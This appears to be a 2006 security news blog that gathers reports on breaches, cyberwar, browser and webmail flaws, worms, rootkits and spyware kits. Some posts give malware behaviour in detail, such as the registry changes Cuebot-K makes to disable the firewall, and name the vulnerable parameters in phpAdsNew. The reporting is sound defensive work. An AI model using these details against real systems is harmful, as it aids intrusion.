"Maybe somebody misused their privileges and stole this information," Kramer said. "I don't know what was the case here, but a surprisingly large percent of these data-centric attacks are actually internal."
Regardless of who probed the network, Kramer said the breach is indicative of how traditional security measures, such as firewalls and intrusion prevention systems (IPS), can't totally shore up a network's defenses, especially if the attack comes from within.
AT&T said it would also pay for credit-monitoring services to assist in protecting the customers involved. The data theft involved people who had bought Digital Subscriber Line equipment for high-speed Internet access.
So far, NASA, University of California, Berkeley, various government web sites and Microsoft have been targeted. Unfortunately, the fifty or so machines publically compromised last week are just the tip of the iceberg. These systems are just peripheral to the amount of Israeli and Arabic computers under attack, but both sides are doing their best to conceal the extent of the attacks.
Hackers from both China and the US have occasionally sparred with one another since early 2001. The initial cyberwar started after a US spy plane collided with a Chinese fighter jet in April of 2001. Thousands of web sites in China and the United States were subject to defacements and hacker attacks for over a month -- and thus earned conflict the title of the first major cyberwar.
The difference between the Sino-American Cyberwar of 2001 is that governments from all sides are participating a bit more, and damages are considerably higher as well. Lebanese newspapers report that the major Hezbollah-backed TV and radio stations have been compromised, and that whoever has retained control of these outlets is now broadcasting messages that Hezbollah's leader Hassan Nasrallah is a liar. PCs compromised in Europe and Russia have been used to send anti-Semitic and anti-Arabic hate mail. Israeli-based denial of service attacks against Hamas and Hezbollah websites have effectively crippled portions of the internet infrastructure on both sides of the conflict.
Digital warfare is certainly a component of modern warfare today: electronics espionage and jamming are almost as old as electronics themselves. This new facet of digital sabotage is another story altogether, with digital warriors partaking from the comfort of their own cable modem virtually side-by-side with government intelligence agencies hacking and counter-hacking the same targets.

Friday, August 18, 2006
Yahoo Inc. has fixed a security vulnerability in its Yahoo Mail service that could have allowed malicious hackers to hijack accounts and harm users in a variety of ways.
"We have developed a fix for this bug and have deployed it worldwide. Yahoo Mail users will not be required to take any action to be protected from this exploit," said Kelley Podboy, a Yahoo spokeswoman, via e-mail. Nir Goldshlager and Roni Bachar from Avnet a computer security company based in Israel, discovered the vulnerability in early August.
The problem was Yahoo Mail's handling of attachments. By creating an HTML attachment with different encoding schemes, one could have bypassed Yahoo Mail's security filter and executed malicious JavaScript code, Bachar said via e-mail.
The exploit allowed the JavaScript code to be executed as soon as a recipient opened the e-mail message, even if the recipient didn't open the attachment.It was also possible to steal the recipient's Yahoo Mail cookie, hijack the session and gain access to the person's in-box. "This attack vector could be used to launch a variety of other more sophisticated attacks," Bachar wrote. These could include unleashing worms, installing keylogger programs, phishing and scanning ports on the PC.

Monday, August 14, 2006
eEye Digital Security is alerting the network security community to the presence of multiple attacks circulating which leverage the attack vector recently patched as part of the MS04-060 (http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx) security bulletin.
Attack Summary
Once infected, an IRC BOT is installed which allows the system to be used for Distributed Denial of Service (DDOS) attacks against other machines. In addition, the malware allows its controller (an outside user) to execute programs, update the BOT software, and exploit other machines. The malware will also attempt to disable Windows firewall and the Windows XP SP2 security alert that triggers when the system’s antivirus software is disabled.
The malware in question is leveraging the Server Service flaw that was patched last Tuesday in the Microsoft bulletin MS06-040. MS06-040 fixes a flaw in an unchecked buffer in the Server Service which allows for anonymous exploitation remotely. At the time of the bulletin’s release, US-CERT and Microsoft had claimed to have seen existing attacks on this flaw, but no evidence had been offered.
At this time there are currently two separate variants of this malware, both using a variant of publicly-disclosed exploit code for MS06-040. While both samples appear to be very similar, they each use a different executable when infecting the system. The first variant uses the file name "wgareg.exe" and the second uses "wgavm.exe". Antivirus vendors have named this threat W32.Wargbot (Symantec), Worm.IRCBOT.JK/JL (Trend Micro), IRC.Mocbot (McAfee), and IRCBOT-ST (F-Secure).
Protection
Users should apply the Microsoft patch to vulnerable systems as soon as possible. As a service to the network security community, eEye has also made available a free utility, which can scan up to 256 systems at once to check for the presence of the flaw patched by MS06-040.
Users of antivirus solutions should make sure that they have the latest signature files. As a final precaution, eEye recommends filtering TCP ports 139 and 445 at your corporate gateway and instructing users to not open any unexpected email attachments.

Saturday, August 05, 2006
Google Inc. has begun alerting users whenever they click on a search result that may take them to a dangerous Web site.
The new feature, which had been spotted earlier this week, goes live officially Friday, according to an announcement from The Stop Badware Coalition, which is collaborating with Google on this effort.
When users attempt to click over to a Web site considered to be potentially dangerous, Google shows users an alert page that informs them of the possible risk and gives them the option to click back to the results page or continue on to the questionable Web site.
The flagged Web sites have been reported as dangerous to The Stop Badware Coalition. Google will progressively replace the generic alert page with pages containing specific reports about the Web sites. The Stop Badware Coalition will provide these individual reports as well.
The Stop Badware Coalition is a nonprofit organization led by Harvard University and the University of Oxford and backed by Google, Lenovo Group Ltd. and Sun Microsystems Inc.
This new Google feature attempts to address a real problem: Search engines routinely display links to Web sites that download spyware and adware to visitors' PCs, exploit security vulnerabilities and attempt to scam users and include them in spam lists.
In the U.S., people land on malicious Web sites about 285 million times per month by clicking on search results from the five major search engines, according to a recent study conducted by McAfee Inc.'s SiteAdvisor unit.
Black Hat Briefings: Microsoft security chief Ben Fathi responds to a standing-room-only demo of a new technique used to plant an offensive rootkit in Windows Vista. LAS VEGAS—Ben Fathi slipped into the darkened, standing-room-only conference room and took a seat on the carpeted floor.
On the Black Hat stage, malware researcher Joanna Rutkowska, of COSEINC, was discussing a new technique that could plant an offensive rootkit in Windows Vista, Microsoft's "most secure ever" operating system.
As corporate vice president for Microsoft's STU (Security Technology Unit), it is Fathi's responsibility to deliver on Vista's security promise, and Rutkowska's claim—complete with live demo—that a key anti-rootkit feature can be easily defeated could be a public relations nightmare. But Fathi was unperturbed. Almost unnoticed in the crowd, he paid close attention to Rutkowska's slides and didn't even flinch when the room erupted in applause as the demo succeeded in loading unsigned code into Vista Beta 2 kernel (x64), without requiring a reboot.
During her talk, she described how scripts can be used to allocate excess amounts of memory to a process, forcing the target system to page out unused code and drivers. At this stage, Rutkowska showed how shell code could be executed inside one of the unused drivers, completely defeating the new device driver signing policy being implemented in Vista to only allow digitally signed drivers to load into the kernel.
Rutkowska created a one-click tool to plant the rootkit and used special heuristics to automatically find out how much memory should be allocated to "knock the unused driver." The shell code used in the demo successfully disabled signature checking in the rooted machine, rendering the system vulnerable to the loading of unsigned drivers.
Even as she basked in the success of the theoretical attack, Rutkowska offered Microsoft a pat on the back for its decision to block unsigned drivers. "The fact that this mechanism was bypassed does not mean that Vista is completely insecure," she said. "It's just not as secure as advertised."
Fathi did not say how Microsoft had fixed the issue in later Vista builds, but he received lots of advice and recommendations from Rutkowska.
Rutkowska said Microsoft should consider forbidding raw disk access from user mode, or encrypting pagefile to keep it in kernel non-paged memory. Though this may cause some performance impact.
On 8 August 2006 Microsoft is planning to release:
Security Updates
Ten Microsoft Security Bulletins affecting Microsoft Windows. The highest Maximum Severity rating for these is Critical. These
updates will be detectable using the Microsoft Baseline Security Analyzer and the Enterprise Scan Tool. Some of these updates will
require a restart.
Two Microsoft Security Bulletins affecting Microsoft Office. The highest Maximum Severity rating for these is Critical. These
updates will be detectable using the Microsoft Baseline Security Analyzer. These updates may require a restart.
Microsoft Windows Malicious Software Removal Tool
Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft
Update, Windows Server Update Services and the Download Center. Note that this tool will NOT be distributed using Software Update
Services (SUS).

Wednesday, July 12, 2006
While the once highly-feared Windows Metafile software code exploit has finally lost some of its steam, another Russia-born threat, WebAttacker, became the most widely used malware attack format in June.
Experts at SophosLabs™, Sophos's global network of virus, spyware and spam analysis centers, have discovered a Russian website that sells spyware kits, called WebAttacker, for fifteen US dollars (about ten UK pounds). The website, which refers to its creators as spyware and adware developers, markets the strengths of its kits, makes the kits available for online purchase and offers technical support to its buyers.
Included in the kits are scripts designed to simplify the task of infecting computers - the buyer spams out a message to email addresses, inviting recipients to visit a compromised website.
Samples found by Sophos's global network of monitoring stations used newsworthy topics to lure unwary users. One presented itself as a warning of the deadly H5N1 bird flu virus, providing links to a bogus website, which purported to contain advice on how to protect "you and your family". The other claims that Slobodan Milosevic was murdered and invites users to visit the site for more information. These websites then attempt to download the malicious code remotely onto the user's PC by taking advantage of known web browser and operating system vulnerabilities.
The new “feature” in this latest WebAttacker release appears to be the addition of an exploit for MS06-014 (MDAC vulnerability ....
http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx.) It seems Microsoft patched this in the April release, so if you're patched, you're probably safe.
It looks as if the WebAttacker folks also pulled out some of the poorer-performing exploits that were evidently not getting enough victims to make it worthwhile. But this version does still include a exploit for a slightly old Firefox.

Saturday, July 08, 2006
New York State Attorney General, Direct Revenue makes "spyware." These programs track where you go on the Internet and clutter your screen with annoying pop-up advertisements for everything from pornography to wireless phone plans. Spyware can get stuck in your computer's hard drive as you shop, chat, or download a song. It might arrive attached to that clever video you just nabbed at no charge.
A must read article and Podcast if you have no time to read. Business Week! So what happens when the wicked witch is dead? They move overseas that is what happens. Without protection or at least threat of action when caught there is little any single user can do accept protect themself.
BitDefender has joined a growing list of security vendors testing tools for rootkit detection and cleanup.
The anti-virus vendor, based in Bucharest, Romania, on July 7 lifted the wraps off a new anti-rootkit utility that promises to spot and delete stealthy software programs that are used by malicious hackers to hide malware. BitDefender's rootkit cleaner will be available as a free stand-alone utility for registered beta testers.
The company's immediate plan is to add rootkit-detection features to its product suite, starting with the next iteration of its consumer Internet security suite. According to data gleaned from Microsoft's MSRT (malicious software removal tool), rootkits on Windows machines are a "potential emerging threat." Of the 5.7 million machines cleaned by the tool since January 2005, 14 percent were infected with a rootkit.
In 20 percent of the cases when a rootkit was found and removed, at least one back-door Trojan was also found, confirming suspicions that rootkits are being used to hide other pieces of malicious software from anti-virus scanners.
Microsoft has added detections for some types of rootkits to its Windows Defender desktop product, and several other security vendors—most notably F-Secure and Winternals—have shipped highly rated anti-rootkit utilities.

Monday, July 03, 2006
It's not every day that a potential security risk emerges that could affect both Microsoft's Internet Explorer and Mozilla Firefox Web browsers. But it is today. Reports abound of a flaw that exists in both browsers that could allow for unintended information disclosure that could put users at risk.
Security researcher Plebo Aesdi Nael first reported a pair of vulnerabilities on a public security mailing list. Only one of the flaws affects both IE and Mozilla browsers. Security firm Secunia has rated the flaws "less critical," but the SANS Internet Storm Center noted that the risk has, "raised some of our neck hairs."
The first flaw involves HTML applications (HTAs), which, according to Microsoft, are full-fledged applications that are trusted and display only the menus, icons, toolbars, and title information that the Web developer creates. The alleged vulnerability requires a user to click on an icon which then takes advantage of the software flaw to disclose potentially confidential user information.
The second flaw involves the exploitation of the "object.documentElement.outerHTML" property. "The abuse of this property will allow an attacker to retrieve remote content in the context of the web page which is being currently viewed by the user," according to the SANS Internet Storm Center (ISC).
So an attacker could rip the data that a user has entered for other Web sites that they may be logged into and steal their user credentials for whatever malicious purpose they desire. Though Nael's original mailing list posting just identifies IE as being at risk, independent analysis by SANS ISC has shown that Firefox is vulnerable to the "object.documentElement.outerHTML" property flaw, as well.
Both Nael and Secunia have posted public proof of concept (PoC) code that demonstrates the flaw in action. Microsoft Security Response Center (MSRC) staffer Adrian Stone indicated on the MSRC blog that Microsoft was aware of the issue and is investigating. Microsoft is currently unaware of any attacks that take advantage of the flaw.

Sunday, July 02, 2006

Security analysts have detected a new piece of malware that appears to run as a Microsoft Corp. program used to detect unlicensed versions of its operating system. Sophos is calling it W32.Cuebot-K, a new variation in the Cuebot family of malware. The worm has a range of malicious functions. After it's installed, the worm immediately tries to connect to two Web sites, a sign it may try to download other bad programs on the machine. Cuebot-K can disable other software, shut off the Windows firewall, download new malicious programs, perform basic distributed denial-of-service attacks, scan local files and spawn a command prompt, Sophos said.
W32/Cuebot-K is a instant messaging worm and backdoor for the Windows platform. W32/Cuebot-K spreads via AOL Instant Messenger.
When first run W32/Cuebot-K copies itself to <Windows system folder>\wgavn.exe and creates the file <Windows folder>\Debug\dcpromo.log.
The file wgavn.exe is registered as a new system driver service named "wgavn", with a display name of "Windows Genuine Advantage Validation Notification" and a startup type of automatic, so that it is started automatically during system startup. Registry entries are created under:
HKLM\SYSTEM\CurrentControlSet\Services\wgavn\
W32/Cuebot-K sets the following registry entries, disabling the automatic startup of other software:
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess Start 4
Registry entries are set as follows:
HKLM\SOFTWARE\Microsoft\Ole EnableDCOM n
HKLM\SYSTEM\CurrentControlSet\Control\Lsa restrictanonymous 1
Registry entries are created under:
HKLM\SOFTWARE\Microsoft\security center\
HKLM\SOFTWARE\Policies\Microsoft\windowsfirewall\domainprofile\
HKLM\SOFTWARE\Policies\Microsoft\windowsfirewall\standardprofile\

Monday, June 26, 2006
Five spreadsheet files with personal data on approximately 28,000 sailors and family members were found on an open Web site, the U.S. Navy announced June 23. The personal data included the name, birth date and social security number on several Navy members and dependents. The Navy said it was notified on June 22 of the breach and is working to identify and notify the individuals affected.
"There is no evidence that any of the data has been used illegally. However, individuals are encouraged to carefully monitor their bank accounts, credit card accounts and other financial transactions," the Navy said in a statement. It said individuals affected by the breach will be contacted soon to ensure they have information on how to guard against identity theft. Information on how to watch for suspicious activity on personal accounts has been posted on the NPC (Navy Personnel Command) Web site.
The files have been removed from the site, and Navy's chief of personnel is working with the law enforcement to determine how and when the files were placed on the Web and prevent future release of information of this type, the statement said. The U.S. Navy becomes the third government department to confirm data loss through computer theft or server compromise. Earlier this week, the Agriculture department said about 26,000 of its employees and contractors could be at risk of identity theft after a hacker broke into its computer system.
A laptop stolen from a government employee in Maryland in May also exposed personal data on about 26.5 million veterans and current military troops.

Sunday, June 25, 2006
Mr. Ofer Shezaf, chief technology officer, Breach Security, Inc., and an officer of the Web Application Security Consortium (WASC), will lead the new Web Hacking Incidents Database project, a new initiative designed to track all reported Web application security breaches. WASC is an international group of security experts and industry leaders that develop, adopt, and advocate best-practice security standards for web application security. WASC maintains a number of projects to generate web application security awareness, classify threats against web applications, and provide evaluation criteria for web application security solutions.
The new Web Hacking Incidents Database (WHID) project tracks publicly-reported security incidents that can be associated with Web application security vulnerabilities exploited through targeted attacks. The goal of the new project is to provide a tool to raise awareness of Web application security problems and provide information for statistical analysis of Web applications security incidents.
In the United States and Europe there are privacy laws that require public reporting of security breaches, however these reports do not indicate how the breach has occurred. The new WHID tracks such security breaches assisting IT managers and business leaders in assessing the threat in insecure web applications and better protect their business-critical information assets. Additional information about the new database can be found at the project's web site at www.webappsec.org/projects/whid.

Wednesday, June 21, 2006
Bit9, Inc has compiled a list of the top 15 applications with known vulnerabilities. Often running outside of IT's knowledge or control, these popular applications run undetected by enterprise IT organizations and are difficult to detect and remove. The list was designed to help IT departments regain control over their desktop environments.
Each application on the list has the following characteristics:
- is well-known in the consumer space and frequently downloaded by individuals;
- is not classified as malicious software by enterprise IT organizations;
- contains at least one critical vulnerability registered in the U.S.(NIST) vulnerability database;
- has a severity rating of between 7.0 - 10.0 (high) on the CVSS scoring system;
- relies on the end user, rather than a central administrator, to manually patch or upgrade the software to eliminate the vulnerability, if such a patch exists.
"These popular software applications are frequently downloaded to corporate desktops and can present serious risks for enterprise computing environments," said Dr. Todd Brennan, co-founder and CTO at Bit9. "Understanding what software is actually running in your organization across your entire desktop environment is the first step in regaining application control and protecting your corporate infrastructure."
Five of the top 15 applications with known vulnerabilities include:
1. Mozilla Firefox 1.0.7
2. Apple iTunes 6.02 & Quicktime 7.0.3
3. Skype Internet phone1.4
4. Adobe Acrobat Reader 7.02, 6.03
5. Sun Java Run-Time Environment 5.0 Update 3, JRE 1.4.2_08
To obtain a copy of the research brief entitled "15 Popular Applications with Critical Vulnerabilities," please visit http://www.bit9.com/15apps.html. Readers will learn how to gain visibility and control of enterprise desktops and laptops to streamline IT, enforce policy compliance, and eliminate unwanted software.

Saturday, June 17, 2006
A cross-site scripting flaw in the PayPal Web site allows a new phishing attack to masquerade as a genuine PayPal log-in page with a valid security certificate, according to security researchers.
Fraudsters are exploiting the flaw to harvest personal details, including PayPal log-ins, Social Security numbers and credit card details, according to staff at Netcraft Ltd., an Internet services company in Bath, England. The PayPal site, owned by eBay Inc., allows users to make online payments to one another, charged to their credit cards, and log-in credentials for the service are a prized target of fraudsters.
The attack works by tricking PayPal members into following a maliciously crafted link to a secure page on PayPal's site. Anyone thinking to check the site's security certificate at this point will see that it is a valid 256-bit certificate belonging to the site, Netcraft employee Paul Mutton wrote in the company's blog on Friday.
However, the URL (uniform resource locator) exploits a flaw in PayPal's site that allows the fraudsters to inject some of their own code into the page that is returned, he wrote. In this case, the result is a warning that the user's account may have been compromised, and that they "will now be redirected to Resolution Center." The page to which they are redirected asks for their PayPal account details -- but thanks to the cross-site scripting flaw in the PayPal site, and the data injected into the URL by the fraudsters, the page is no longer on the PayPal site. Instead, the page steals the log-in details and sends them to the fraudsters' server, then prompts the user for other personal information, Mutton said.
The Web server harvesting the personal details is hosted in Korea, Mutton said. If the malicious link arrived by e-mail, then "there would be clues in the mail that it's not genuine," he said. "It's a technique chosen by fraudsters because it is hard to spot."
Organizations considering the use of Asynchronous JavaScript and XML (AJAX) technologies to create more dynamic Web sites need to ensure they are not inadvertently opening doors into otherwise secure applications, analysts warned. While AJAX by itself doesn't create new security risks, it has a tendency to amplify the seriousness of several well-understood threats, including SQL injections, cross-site scripting and denial-of-service attacks, they said.
A case in point is this week's mass-mailing Yamanner worm, which took advantage of an apparent cross-site scripting error in Yahoo Inc.'s e-mail service to infect thousands of computers. The worm arrived in Yahoo e-mail user in-boxes bearing the subject header "New Graphic Site" and was activated simply by a user opening the infected e-mail.
The worm used JavaScript functions in a user's browser to access Yahoo's e-mail service and perform actions on behalf of the user -- such as looking for names in the Yahoo address list and sending them e-mails containing copies of the worm -- without the user's knowledge. Such threats can be amplified in Web applications built with AJAX if proper care is not taken to validate user requests coming in via the browser, said Billy Hoffman, lead R&D engineer at Web security vendor SPI Dynamics in Atlanta.
AJAX is a programming technique that allows companies to make their Web sites more responsive to user input than pages built with HTML by enabling new content to be added to a Web page without needing the entire page to be reloaded. The task is accomplished by allowing the browser to fetch small amounts of data from the Web server from which the content is loaded using JavaScript and XML technologies.
The approach is more efficient than having an entire Web page reload every time content needs to be refreshed. But it also increases the amount of traffic flowing between the browser and the Web server, thus increasing the potential for attacks such as the Yamanner worm.

Wednesday, June 14, 2006
We download it in our updates all the time though it seems few know how to use it. Of course MS wants us all to go to the site here and have you run a web page to get the results. http://www.microsoft.com/security/malwareremove/default.mspx and also you can go here. http://www.microsoft.com/athome/security/viruses/malware.mspx Personally most people do not want to go to a web page to do this.
I also discovered it can be ran in an automated way and is rather straightforward. However, I doubt your grandma will get it. http://support.microsoft.com/kb/891716
I would rather be sure you are on your game granny. So go Start/Run/MRT and there it is. The wizard interface, will allow you to do custom, full, and quick scans? Also It will quickly tell you how current you are and what malware can be removed.

| • |
/Q or /quiet - Use quiet mode. This option suppresses the user interface of the tool. |
| • |
/? - Display a dialog box that lists the command-line switches. |
| • |
/N - Run in detect-only mode. In this mode, malicious software will be reported to the user but will not be removed. |
| • |
/F - Force an extended scan of the computer. |
| • |
/F:Y - Force an extended scan of the computer and automatically clean any infections found. |
U.S. government efforts to require most voice-over-IP providers to permit law enforcement agencies to wiretap phone calls could introduce new security problems to the Internet, a group of Internet security experts said today.
A Federal Communications Commission rule requiring providers to allow wiretapping by May 2007 would either require a massive re-engineering of the Internet or introduce broad cybersecurity risks, said authors of a new study released by the Information Technology Association of America (ITAA), an IT vendor trade group. In addition, the requirements would stall Internet innovations in the U.S. by adding hundreds of thousands of dollars in setup and maintenance costs to providers and potentially to other Internet applications that provide voice services, including instant messaging and online games, said the study (download PDF)
The study, co-authored by several people, including TCP/IP co-creator Vinton Cerf, public-key cryptography pioneer Whitford Diffie and former National Security Agency encryption scientist Clinton Brooks, comes days after a U.S. appeals court upheld the FCC's wiretapping rules. On Friday, the U.S. Court of Appeals for the District of Columbia upheld the ruling, requiring that providers offering a substitute for traditional telephone service comply with a 1994 telephone wiretapping law called the Communications Assistance for Law Enforcement Act (CALEA) (see "Court upholds VoIP wiretapping").
The FCC did not immediately respond to a request for comments about the ITAA study. But on Friday, FCC Chairman Kevin Martin said allowing law enforcement wiretapping of calls is of "paramount importance" to U.S. security.
In one of the largest security updates since moving to a monthly patch release cycle, Microsoft Corp. today issued 12 bulletins detailing fixes for 21 separate vulnerabilities in a wide range of products. Eight of the bulletins and 12 of the vulnerabilities were rated "critical" by the company. Three bulletins detailed fixes for "important" flaws, while one described a flaw of moderate severity. The vulnerabilities disclosed today affect several Microsoft products, including Internet Explorer (IE), Windows Media Player, Microsoft Outlook and PowerPoint.
Today's announcement is "certainly one that people need to sit up and take notice of," said Michael Sutton, director of VeriSign Inc.'s iDefense Labs. He also noted that most of the critical flaws disclosed today are on the client side, highlighting a continuing trend away from server-side security issues. "Client-side vulnerabilities have become one of the most prominent methods by which computers become infected today," Oliver Friedrichs, director of Symantec Corp.'s security response group, said in a statement. "Today's release continues that trend" and highlights the danger users face simply by visiting certain Web sites, he said.
One of the bulletins rated as critical by Microsoft described a cumulative upgrade for Internet Explorer that fixed eight newly discovered flaws in the company's Web browser. The impact of the flaws included remote code execution, information disclosure and user spoofing, according to Microsoft. Another bulletin offers a fix for a critical vulnerability in how Windows handles the ART image format used by America Online Inc.'s client software. An attacker could exploit the flaw by creating a specially crafted ART image that would allow for remote-code execution on a victim's computer.
Another critical remote-code execution vulnerability disclosed today involves Microsoft Windows Media Player technology. The buffer-overflow flaw exists in the way Media Player handles the Portable Network Graphics (PNG) image format associated with Media Player and could allow an attacker to take complete control of an affected system, the company warned. In addition, security administrators should pay particular attention to vulnerabilities detailed in bulletin MS06-25 and MS06-29, according to an advisory from McAfee Inc.

Tuesday, June 13, 2006
Microsoft Corp. is set to release research showing, among other things, that its security tools find malicious software on about one in every 311 times it scans a PC. The research is part of a major report on security trends that Microsoft plans to release today at its TechEd user conference in Boston.
Microsoft's data is remarkable because it comes from such a large sample group -- more than 270 million users of the Windows Malicious Software Removal Tool, which ships with Windows. Between January 2005 and March 2006, that tool was used to remove 16 million pieces of malware from 5.7 million computers. The software was used to scan systems 2.7 billion times during that period, and on average, it finds something malicious about 0.32% of the time, or in one out of every 311 scans, according to Microsoft.
Microsoft couldn't say what percentage of PCs have been infected by malicious software. Although 5.7 million out of 270 million PCs would translate to about 1 in 47 machines, the total number of computers scanned was far greater than 270 million, so the actual rate of infection is much lower, according to Microsoft.
There has been no widespread virus outbreak for several years, but users are increasingly concerned about targeted attacks, identity theft and dangerous rootkit software, which covers its own tracks on the computer. So does Microsoft think things are getting better, or worse? "That's a difficult question to answer," said Matthew Braverman, a program manager with Microsoft's antimalware team. He noted that it's impossible to get a complete picture of everything that the bad guys are doing but said that he does think things are improving.
The amount of malware in circulation has dropped for 41 of the 53 families of worms, rootkits and viruses that Microsoft tracked over the past 15 months. And the occurrence of 21 of these variants has dropped by a lot -- more than 71%, according to Braverman. "I think that shows that the malware problem is getting better," he said.

Saturday, May 27, 2006
Security researchers at eEye Digital Security Inc. have discovered a serious flaw in Symantec Corp.'s enterprise antivirus software that could be used by hackers to create a self-replicating "worm" attack against Symantec users.
Because Symantec has not yet confirmed the existence of the problem, much less patched it, eEye is offering few details on the vulnerability, which was first disclosed late Wednesday.
"This is definitely a wormable flaw," said Mike Puterbaugh, eEye's vice president of marketing. "It does allow you to take remote control of the system." Similar to viruses, worms are able to spread from computer to computer, and past attacks such as 2003's Blaster and Slammer worms were widespread. Symantec is evaluating eEye's claims and "if necessary, will provide a prompt response and solution," a Symantec spokesman said today.
EEye Chief Hacking Officer Marc Maiffret believes that it will take Symantec a "month or two" to patch the problem. "The vulnerability is pretty straightforward for them to identify within their code," he said. Version 10 and greater of Symantec's enterprise antivirus software is affected by the flaw, but the company's consumer products do not have the bug, Maiffret said.
This is not the first flaw to be reported in Symantec's security products, which have increasingly come under the scrutiny of hackers and security researchers over the past year. Last December, researcher Alex Wheeler discovered a flaw (PDF) in Symantec's Antivirus Library that could allow remote attackers to gain control of systems that used Symantec's products.

Tuesday, May 23, 2006
FOSTER CITY, CALIF – May 19, 2006 – Research experts at FaceTime Security Labs™ identified and reported a new threat today affecting Yahoo! Messenger. FaceTime researchers confirmed that a self-propagating worm, named yhoo32.explr, installs 'Safety Browser' and hijacks the Internet Explorer homepage, leading users to a site that puts spyware on their PCs. Because Safety Browser uses the IE icon, users can easily mistake it for Internet Explorer. This is the first recorded incidence of malware installing its own web browser on a PC without the user's permission.
The self-propagating worm spreads the infection to all contacts in Yahoo! Messenger by sending a website link that loads a command file onto the user's PC and installs Safety Browser. This spam over instant messaging (IM) is called spim. IM applications and protocols are an increasingly popular vector to distribute malicious files and executables.
"This is one of oddest and more insidious pieces of malware we have encountered in years," commented Tyler Wells, Senior Director of Research at FaceTime Security Labs. "This is the first instance of a complete web browser hijack without the user's awareness. Similar 'rogue' browsers, such as 'Yapbrowser', have demonstrated the potential for serious damage by directing end-users to potentially illegal or illicit material. 'Rogue' browsers seem to be the hot new thing among hackers."
The India research arm of FaceTime Security Labs discovered the threat in a 'honeypot', a trap they set to detect viruses, worms, spyware and other threats. Commentary on this threat by FaceTime Security Labs researcher Chris Boyd can be found on the Greynets Blog, at http://blog.spywareguide.com. FaceTime Security Labs is the threat research division of IM and Greynet security leader FaceTime Communications.
Threat name: yhoo32.explr
Threat type: Browserware and worm
Who is affected: Users of Yahoo! Messenger
Additional Information: The malware infects the PC with two elements. The first element is a web browser called "Safety Browser." This stand-alone application has no uninstaller and disguises itself with an Internet Explorer logo in some instances. The application also hijacks the personal homepage in Internet Explorer and points users to Safety Browser's homepage (demoplanet.tv). The hijack also plays looped music that cannot be stopped when the user starts up the PC or Safety Browser. The second element is the self-propagating worm. This worm installs an .exe file that spreads the infection through Yahoo Messenger to everyone on the Contacts List.

Monday, May 22, 2006
What if a computer geek could write a program that could make friends for him? That's what 19-year-old "Samy" did in October on the social networking site MySpace. Samy, who started programming at 12, was trying Ajax, the latest star of the Web 2.0 technologies. It stands for Asynchronous Javascript and XML, and in effect lets your browser talk to websites without you knowing about it. (There's a primer at http://tinyurl.com/7xzse.) Web users generally experience it as a smooth interaction that doesn't have to load a new page - like dragging a mouse around the Google Maps interface. Used on sites such as Odeo and Gmail, it allows them to be as interactive as desktop programs. But Samy found a sneakier power in Ajax.
MySpace, the seventh most popular English-language website according to Alexa Internet, allows people to set up pages as part of a "profile" and find others through their profiles; they can add those people as "friends".
"The idea was simple. I wanted anyone who viewed my profile to automatically add me as a friend," says Samy. "When I realised I could do this via Ajax, I figured I could replicate my Ajax code into any profile my code was modifying."
After some tweaking to circumvent MySpace's systems from preventing Javascript code running, Samy created Ajax code on his MySpace site that ran automatically when anyone looked at his profile. Because Ajax can interact with pages users never see, his code pressed all the relevant buttons to add Samy to the victim's friends, and added the words "but most of all, samy is my hero" to their page. Finally, the code pasted itself into the victim's profile, so that any MySpace user viewing the victim's page would have their page infected. MySpace users were unaware their computers were doing anything unusual.
Forced to shut down The code - strictly speaking, a cross-site scripting worm - spread exponentially. Within 24 hours Samy had a million emails from MySpace users "wanting" to be his friend and to whom he was their "hero". MySpace was forced to shut down and make changes to stop Samy's code spreading. The MySpace Worm, as it came to be called, served as an alarming example of what malicious hackers could do, even if they only had access to your browser.
"The potential, or threat, with Ajax malware is that server communication is now hidden from the user," says Jesse James Garrett, who coined the term Ajax. "As a result the application can do things on your behalf without your knowledge." On a web page, Ajax can do as much as Javascript - though that's limited locally (it can't delete files apart from cookies on your computer). But it can do almost anything to a web page you have visible.
Garrett now consults for Adaptive Path, which has helped companies create their web experiences. He often explains the popularity of Ajax as a way of making sites feel faster and more feature-rich, and allowing more of the computational work of web application to happen on the user's computer. However, if a site isn't secure, it means your browser can step through complex actions, with you none the wiser.

Sunday, May 21, 2006
Today, cyberscams are the fastest-growing criminal niche. Scores of banks and e-commerce giants, from JPMorgan Chase & Co. (JPM) to walmart.com (WMT), have been hit, sometimes repeatedly, by hackers and online fraud schemes. The 2005 FBI Computer Crime Survey estimated annual losses to all types of computer crime -- including attacks of viruses and other "malware," financial fraud, and network intrusions -- at $67 billion a year. Of the 2,066 companies responding to the survey, 87% reported a security incident. The U.S. Federal Trade Commission, which says identity theft is its top complaint, on May 10 created an Identity Theft Task Force following an executive order signed by President George W. Bush.
To track cybercrime, law enforcement officers work with companies such as eBay Inc. (EBAY) or Microsoft Corp. (MSFT) as well as with authorities around the globe. EBay has 60 people combating fraud, while Microsoft's Internet Safety Enforcement team has 65 operatives, including former law enforcement agents and federal prosecutors. To document the extent of the activity, BusinessWeek reporters also scoured underground Web sites where stolen data is swapped like so many baseball cards on eBay. Consider this e-mail promoting the launch of an online trading bazaar, vendorsname.ws, last year:
"During the battle with US Secret Service, we !@#&! all those [law enforcement] bastards and now are running a brand new, improved and the biggest carder' forum you ever seen." The message brags about its array of stolen goods: U.S. and European credit-card data, "active and wealthy" PayPal (EBAY) accounts, and Social Security numbers. Those who "register today" get a "bonus" choice of "one Citybank account with online access with 3K on board" or "25 credit cards with PINs for online carding." "Full Article"

Saturday, May 20, 2006

phpAdsNew / phpPgAds < 2.0.6 Multiple Vulnerabilities
The remote host is running phpAdsNew / phpPgAds, an open-source banner ad server.
The version of phpAdsNews / phpPgAds installed on the remote host suffers from several flaws :
- Remote PHP Code Injection Vulnerability
The XML-RPC library bundled with the application allows an attacker to inject arbitrary PHP code via the 'adxmlrpc.php' script to be executed within the context of the affected web server user id.
- Multiple Local File Includion Vulnerabilities
The application fails to sanitize user-supplied input to the 'layerstyle' parameter of the 'adlayer.php' script and the 'language' parameter of the 'admin/js-form.php' script before using them to include PHP files for execution. An attacker can exploit these issues to read arbitrary local files provided PHP's 'magic_quotes' directive is disabled.
- SQL Injection Vulnerability
An attacker can manipulate SQL queries via input to the 'clientid' parameter of the 'libraries/lib-view-direct.inc.php' script.
See also : http://www.securityfocus.com/archive/1/408423/30/120/threaded
